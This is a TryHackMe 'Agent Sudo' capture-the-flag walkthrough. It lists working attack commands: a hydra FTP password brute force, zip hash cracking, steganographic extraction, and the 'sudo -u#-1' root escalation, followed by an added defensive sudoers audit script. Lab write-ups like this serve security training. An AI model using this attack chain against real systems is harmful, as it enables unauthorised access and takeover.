TryHackMe Agent Sudo room walkthrough
This is a write-up covering the steps taken to solve Agent Sudo, a beginner-level security challenge room on the TryHackMe platform.
This blog was written as part of a task for the Masters Certification in Red Team Program from HackerU.

Step 1 : Connect to TryHackMe and start target machine
1. Download the OpenVPN configuration file from the TryHackMe platform
2. Connect to TryHackMe by running this command in a Kali terminal:
sudo openvpn /pathtoOVPNfile.ovpn
3. Start the machine in the ‘Agent sudo’ room; the target IP address will be displayed in a minute.
https://tryhackme.com/room/agentssudoctf
Step 2 : Information gathering using Nmap
- Start an nmap scan of the target IP:
nmap -A -O <target ip>

Step 3: Detailed Findings
Open ports:
21 : FTP
22 : SSH
80 : http
1. Accessing port 80 (HTTP)

View source code > No info found

2. Navigating to robots.txt > No details found

3. Using dirbuster to find directories and files > Found nothing interesting

4. After observing the message on port 80, used curl to get details
curl -L <targetip>

5. The message says to use your own ‘user-agent’, and the signature suggests that the codename is a letter of the alphabet, so tried curl with the -A flag and different letters
curl -A "A" -L <targetip>

curl -A "B" -L <targetip>

curl -A "C" -L <targetip>
Found agent name chris

6. As the FTP port is open, tried brute forcing with hydra to identify the FTP credentials
hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.208.107 ftp 21

7. Logging into FTP using above findings > Found 3 files > copied all 3 files to local machine
ftp <targetip>
get <filename>

8. Opening the copied files

9. Based on the above hint, now trying to extract data from the other 2 image files using stegextract.
Extracting files from images
binwalk cutie.jpg -e

Found _cutie.jpg.extracted > which had 4 files

Cracking .zip file using zip2john
zip2john 8702.zip >test.txt
Cracking the hash in test.txt using john > found password to open zip file
john test.txt

Extracting 8702.zip using 7z
7z e 8702.zip

cat To_agentR.txt

Found message to extract files from cute-alien.jpg
Used CyberChef to decode the hint.

Used steghide to extract hidden message
steghide extract -sf cute-alien.jpg

Found password for agent james

10. Used the above information to log in over SSH as user james with the found password > SSH login successful
ssh james@<targetip>

11. Found User_flag.txt

12. Checking privileges with sudo -l

13. Got root access
sudo -u#-1 /bin/bash

Found root.txt
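
A defender's check for the condition that step 13 relies on, added here as an example and not part of the original write-up: sudo releases before 1.8.28 resolve the user ID -1 to root when a rule's Runas list grants ALL, even if the same list excludes root. The function names, the EXPOSED/FRAGILE/OK labels and the sample sudoers text are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a host for the condition behind "sudo -u#-1".
# The sudoers text below is constructed sample data, not output from the room.

# Return 0 when a sudo version string (e.g. "1.8.27p1") is older than 1.8.28.
sudo_version_affected() {
    v=${1%%[!0-9.]*}                 # drop suffixes such as "p1"
    old_ifs=$IFS; IFS=.
    set -- $v                        # split into major minor patch
    IFS=$old_ifs
    major=${1:-0}; minor=${2:-0}; patch=${3:-0}
    [ "$major" -lt 1 ] && return 0
    [ "$major" -gt 1 ] && return 1
    [ "$minor" -lt 8 ] && return 0
    [ "$minor" -gt 8 ] && return 1
    [ "$patch" -lt 28 ]
}

# Read sudoers text on stdin; print rules whose Runas list "(...)" grants ALL
# and also carries a "!" exclusion, e.g. (ALL, !root).
risky_runas_rules() {
    grep -v '^[[:space:]]*#' |
        grep -E '\(([^)]*,)?[[:space:]]*ALL[[:space:]]*(,[^)]*)?\)' |
        grep -E '\([^)]*![^)]*\)'
}

# audit VERSION < sudoers-text : print EXPOSED, FRAGILE or OK.
audit() {
    rules=$(risky_runas_rules) || rules=
    if [ -z "$rules" ]; then
        echo OK                      # no rule depends on a Runas exclusion
    elif sudo_version_affected "$1"; then
        echo EXPOSED                 # exclusion present and sudo is unpatched
    else
        echo FRAGILE                 # patched, but the rule is still a denylist
    fi
}

SAMPLE_SUDOERS='# constructed sample
root   ALL=(ALL:ALL) ALL
james  ALL=(ALL, !root) /bin/bash
backup ALL=(backup) /usr/bin/rsync'

printf '%s\n' "$SAMPLE_SUDOERS" | audit 1.8.27   # EXPOSED
printf '%s\n' "$SAMPLE_SUDOERS" | audit 1.8.31   # FRAGILE
```

On a real host, pass the version reported by `sudo -V` and pipe in the rules from /etc/sudoers and /etc/sudoers.d/. A FRAGILE result is a prompt to replace the exclusion with an explicit list of permitted Runas users.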

With these steps, I was able to answer all questions posted in agent sudo room on TryHackMe.
Thank you for reading this blog.